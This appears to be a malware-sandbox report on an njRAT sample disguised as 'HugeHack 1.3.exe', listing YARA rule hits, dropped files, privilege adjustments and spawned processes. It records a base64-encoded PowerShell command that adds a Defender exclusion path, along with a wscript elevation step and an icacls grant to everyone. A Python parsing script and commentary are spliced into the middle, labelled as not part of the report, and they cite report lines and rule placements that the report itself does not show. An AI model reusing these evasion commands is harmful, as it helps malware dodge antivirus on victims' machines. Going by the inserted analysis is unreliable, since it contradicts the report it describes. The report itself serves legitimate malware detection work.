Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\ClickMe.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\ClickMe.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
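The matched-rule lines above are easier to act on once grouped by rule and artifact type: a rule that fires on the submitted sample, on the unpacked PEs, on the memory dumps and on every dropped file (Windows_Trojan_Njrat_30f3c220, njrat1 and the JPCERT/CC Njrat rule) is the one to load into a live memory scanner and a hunt, while a rule that fires only on PE artifacts (CN_disclosed_20180208_c and Unknown_Malware_Sample_Jul17_2, neither of which appears in any MEMORY line) is a file-only signal. The script below is an added example, not part of the report and not code from Joe Sandbox or from any of the rule authors listed; it parses a copied subset of the lines above, assuming the "Source: ..., type: ... Matched rule: ..." grammar shown, and the function names, metadata splitting and summary shape are choices made for this example.

```python
"""Group the report's 'Source: ..., type: ... Matched rule: ...' lines by rule and artifact type.

Added example (not Joe Sandbox code, not any rule author's code). SAMPLE_LINES are copied
from the report; the line grammar, function names and summary layout are assumptions.
"""
import re
from collections import defaultdict

# Metadata of the Elastic rule exactly as printed in the report, shared by several lines.
ELASTIC_META = (
    "reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, "
    "os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, "
    "license = Elastic License v2, threat_name = Windows.Trojan.Njrat, "
    "fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, "
    "id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04"
)
MEMDUMP = "00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp"
STARTUP_EXE = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
               r"\c382eb151c59bd833b24120723eac541.exe")

# Subset of the report's matched-rule lines (copied from the report, not invented).
SAMPLE_LINES = [
    "Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: njrat1 date = 2015-05-27, "
    "author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net",
    "Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: Njrat hash1 = "
    "d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, "
    "description = detect njRAT in memory, rule_usage = memory scan",
    "Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, "
    "description = Detects NjRAT / Bladabindi",
    f"Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 {ELASTIC_META}",
    "Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, "
    "hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, "
    "description = Detects malware from disclosed CN malware set, "
    "reference = https://twitter.com/cyberintproject/status/961714165550342146, "
    "license = https://creativecommons.org/licenses/by-nc/4.0/",
    f"Source: {MEMDUMP}, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 {ELASTIC_META}",
    f"Source: {MEMDUMP}, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, "
    "description = Identify njRat, author_email = bwall@ballastsecurity.net",
    f"Source: {MEMDUMP}, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, "
    "author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan",
    f"Source: {STARTUP_EXE}, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 {ELASTIC_META}",
    rf"Source: C:\ClickMe.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 {ELASTIC_META}",
    rf"Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 {ELASTIC_META}",
    rf"Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 {ELASTIC_META}",
]

LINE_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<type>[A-Z]+) Matched rule: (?P<rule>\S+)(?: (?P<meta>.*))?$"
)


def parse_meta(meta):
    """Split 'key = value, key = value' metadata; a chunk without ' = ' continues the previous value
    (needed because values such as 'scan_context = file, memory' contain the separator)."""
    fields, key = {}, None
    for chunk in meta.split(", "):
        if " = " in chunk:
            key, _, value = chunk.partition(" = ")
            fields[key.strip()] = value.strip()
        elif key is not None:
            fields[key] += ", " + chunk
    return fields


def aggregate(lines):
    """rule -> artifact type -> set of distinct sources, plus the first metadata seen per rule."""
    hits = defaultdict(lambda: defaultdict(set))
    meta = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a matched-rule line; other report lines are ignored
        hits[m["rule"]][m["type"]].add(m["source"])
        if m["meta"] and m["rule"] not in meta:
            meta[m["rule"]] = parse_meta(m["meta"])
    return hits, meta


def summarize(hits):
    """Flatten to rule -> {artifact type: number of distinct artifacts it fired on}."""
    return {rule: {t: len(s) for t, s in by_type.items()} for rule, by_type in hits.items()}


def memory_capable_rules(hits):
    """Rules that also fired on process memory dumps: the ones worth loading into a live memory scanner."""
    return sorted(rule for rule, by_type in hits.items() if "MEMORY" in by_type)


def dropped_files(hits):
    """Every on-disk artifact flagged as DROPPED by any rule: the file-path IOC list for this sample."""
    return sorted({src for by_type in hits.values() for src in by_type.get("DROPPED", ())})


if __name__ == "__main__":
    hits, meta = aggregate(SAMPLE_LINES)
    for rule, counts in summarize(hits).items():
        print(rule, counts, "| author:", meta.get(rule, {}).get("author", "?"))
    print("memory-capable:", memory_capable_rules(hits))
    print("dropped:", *dropped_files(hits), sep="\n  ")
```

Run against the full report rather than the subset, the DROPPED list is the four paths shown above (the Startup copy, C:\ClickMe.exe, the Temp Payload.exe and the Roaming dllhost.exe); the Elastic rule's "severity = x86" is reproduced exactly as the report prints it, so treat that field as the report's own rendering rather than as the rule's intended value.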
Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.phis.bank.troj.adwa.spyw.expl.evad.winEXE@33/24@4/4
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_00E8AB0A AdjustTokenPrivileges, 2_2_00E8AB0A
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_00E8AAD3 AdjustTokenPrivileges, 2_2_00E8AAD3
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0098AD86 AdjustTokenPrivileges, 16_2_0098AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 16_2_0098AD4F AdjustTokenPrivileges, 16_2_0098AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 22_2_013BAD86 AdjustTokenPrivileges, 22_2_013BAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 22_2_013BAD4F AdjustTokenPrivileges, 22_2_013BAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 23_2_014EAD86 AdjustTokenPrivileges, 23_2_014EAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 23_2_014EAD4F AdjustTokenPrivileges, 23_2_014EAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_0060AD86 AdjustTokenPrivileges, 25_2_0060AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_0060AD4F AdjustTokenPrivileges, 25_2_0060AD4F
Source: C:\Users\user\AppData\Local\Temp\Payload.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\dllhost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\c382eb151c59bd833b24120723eac541
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\ere.js Jump to behavior
Source: HugeHack 1.3.exe.bin.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: HugeHack 1.3.exe.bin.exe Virustotal: Detection: 76%
Source: HugeHack 1.3.exe.bin.exe ReversingLabs: Detection: 91%
Source: javaw.exe String found in binary or memory: *[Ljavafx/scene/paint/Stop;ass
Source: javaw.exe String found in binary or memory: *[Ljavafx/scene/paint/Stop;ass
Source: javaw.exe String found in binary or memory: +com/sun/javafx/application/LauncherImpl$$Lambda$54
Source: javaw.exe String found in binary or memory: (ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe String found in binary or memory: (ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe String found in binary or memory: (Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
Source: javaw.exe String found in binary or memory: (Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
Source: javaw.exe String found in binary or memory: com/sun/javafx/application/LauncherImpl$$Lambda$49
Source: javaw.exe String found in binary or memory: -Kcom/sun/javafx/css/parser/StopConverter
Source: javaw.exe String found in binary or memory: -Kcom/sun/javafx/css/parser/StopConverter
Source: javaw.exe String found in binary or memory: T(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe String found in binary or memory: T(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe String found in binary or memory: -addString
Source: javaw.exe String found in binary or memory: -AddToSelection
Source: javaw.exe String found in binary or memory: K/(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe String found in binary or memory: K/(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: unknown Process created: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe "C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
